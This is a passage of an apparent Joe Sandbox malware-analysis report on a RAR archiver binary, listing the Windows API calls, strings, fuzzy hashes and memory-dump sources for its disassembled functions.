                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F014F54A0D66340F96C96AEAB4027A11917F8CBE4F1CC730EF2DC62F6ED2CE4014E05
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CompareString
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1825529933-0
                                                                                                                                                                                                                              • Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                              • Instruction ID: 86b3aff072b4b35d7ad01fb3b118622e909b1495c688781f36ccf535ea9a315f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F01626170C6A245EE14AF1AB40406AE661FB9DFD0F5C4934EF8D8BB6ACE3CD1428704
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseFind
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1863332320-0
                                                                                                                                                                                                                              • Opcode ID: 37315976747a324bc4a89ca9f4e050d50d4baea4dbab69f22b0b8f40f318d585
                                                                                                                                                                                                                              • Instruction ID: 4695588156d6256d0a1bfe735d836548b984eaa1eb158b1ef22ef0fb4894aa2c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 37315976747a324bc4a89ca9f4e050d50d4baea4dbab69f22b0b8f40f318d585
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9DF086359482C146DA15DB79A1092F82760BB0EBB5F084375DFBC4B2E7CF5C90858720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                              • Instruction ID: 6be09e87cbe8f3173ef70e74ba2dbb3356ebfdcec141e945412c15fff905f4ef
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CF05E21B4E25340FA5C6AAE585027912847F4C7A0F0D4B30EF2EC63E1DE6CE4418D18
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                              • Instruction ID: 060052920554f354ab94a1dd135d4d83206a5620f49d879f84fdc571d32a541f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62E04F50F29302C0ED6EA62A185B07D02603FAEB80E54643ACE1EC63A2DF1DB4559720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                                                                                              • Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                              • Instruction ID: 84059751c8a71e96d4032afa7b8d7f9c73cf8cc29f3c9305fcbdd86208bf4877
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FD09E65E1A90686F70EDB49E8657301261FF5C799F450734CB1D85571CFAD20D48308
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000,?,00000000,?,00007FF6BBCF7A8C), ref: 00007FF6BBCD4549
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseFind
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1863332320-0
                                                                                                                                                                                                                              • Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                              • Instruction ID: 9c340a6bbd13502c7511ece7d6ecaf2d12ed5a4813b41556c9fcb9648c7174fc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4C04C69E4548185D548972D98591641120BB49B35F941731D33D455F09F5854AB4700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                                                                              • Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                              • Instruction ID: 6ee6671c07fabd77236a37f0ddf666491f854ddd207baf15cc2c8ec9db9c962c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81F0AF22A8864649FB28CB68E4483796660EB18BB8F586334D77D850E9CF6CD892C750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCF49F4: LoadStringW.USER32 ref: 00007FF6BBCF4A7B
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCF49F4: LoadStringW.USER32 ref: 00007FF6BBCF4A94
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCFB6D0: Sleep.KERNEL32(?,?,?,?,00007FF6BBCCCBED,?,00000000,?,00007FF6BBCF7A8C), ref: 00007FF6BBCFB730
                                                                                                                                                                                                                              • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6BBCD6CB0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LoadString$Sleepfflushswprintf
                                                                                                                                                                                                                              • String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$EOF$RAR 1.4$RAR 4$RAR 5$V
                                                                                                                                                                                                                              • API String ID: 668332963-4283793440
                                                                                                                                                                                                                              • Opcode ID: cff16b410779efd6418cbb4bfaefd77790891fdcb5da60b35bb77876aa469163
                                                                                                                                                                                                                              • Instruction ID: f529568c97b89dfd19e5f01d174ac3dc0b293305e167f3acf0547f481bf1aba3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cff16b410779efd6418cbb4bfaefd77790891fdcb5da60b35bb77876aa469163
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A22C022A4DAC255EB24DB2CE8541FA67B1FF99344F440136D78D87ABADF2CE649C700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32 ref: 00007FF6BBCCD4A6
                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00007FF6BBCCD4B9
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCCEF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6BBCCEE47), ref: 00007FF6BBCCEF73
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCCEF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF6BBCCEE47), ref: 00007FF6BBCCEF84
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCCEF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6BBCCEFA7
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCCEF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6BBCCEFCA
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCCEF50: GetLastError.KERNEL32 ref: 00007FF6BBCCEFD4
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCCEF50: CloseHandle.KERNEL32 ref: 00007FF6BBCCEFE7
                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32 ref: 00007FF6BBCCD4C6
                                                                                                                                                                                                                              • CreateFileW.KERNEL32 ref: 00007FF6BBCCD64A
                                                                                                                                                                                                                              • DeviceIoControl.KERNEL32 ref: 00007FF6BBCCD68B
                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00007FF6BBCCD69A
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00007FF6BBCCD6AD
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32 ref: 00007FF6BBCCD6FA
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32 ref: 00007FF6BBCCD705
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCD2310: FlushFileBuffers.KERNEL32 ref: 00007FF6BBCD233E
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCD2310: SetFileTime.KERNEL32 ref: 00007FF6BBCD23DB
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCD1930: CloseHandle.KERNELBASE ref: 00007FF6BBCD1958
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCD39E0: SetFileAttributesW.KERNEL32(?,00007FF6BBCD34EE,?,?,?,?,00000800,00000000,00000000,00007FF6BBCE38CB,?,?,?,00007FF6BBCE41EC), ref: 00007FF6BBCD3A0F
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCD39E0: SetFileAttributesW.KERNEL32(?,00007FF6BBCD34EE,?,?,?,?,00000800,00000000,00000000,00007FF6BBCE38CB,?,?,?,00007FF6BBCE41EC), ref: 00007FF6BBCD3A3C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CloseHandle$Create$AttributesDirectoryErrorLastProcessToken$AdjustBuffersControlCurrentDeleteDeviceFlushLookupOpenPrivilegePrivilegesRemoveTimeValue
                                                                                                                                                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                                                                              • API String ID: 2750113785-3508440684
                                                                                                                                                                                                                              • Opcode ID: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                                                                                                                                                                                              • Instruction ID: ecd452e95971b7281485447228d21bfc9314b26f61b452cc7dceadc7b4c28870
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1D1DF26A0868696EB24DF28E8542FD73B0FB58798F504231DB5D876E9DF3CE50AC740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2E4C), ref: 00007FF6BBCFAEE9
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2E4C), ref: 00007FF6BBCFAF01
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2E4C), ref: 00007FF6BBCFAF19
                                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2E4C), ref: 00007FF6BBCFAF75
                                                                                                                                                                                                                              • GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2E4C), ref: 00007FF6BBCFAFB0
                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2E4C), ref: 00007FF6BBCFB23B
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2E4C), ref: 00007FF6BBCFB244
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2E4C), ref: 00007FF6BBCFB287
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
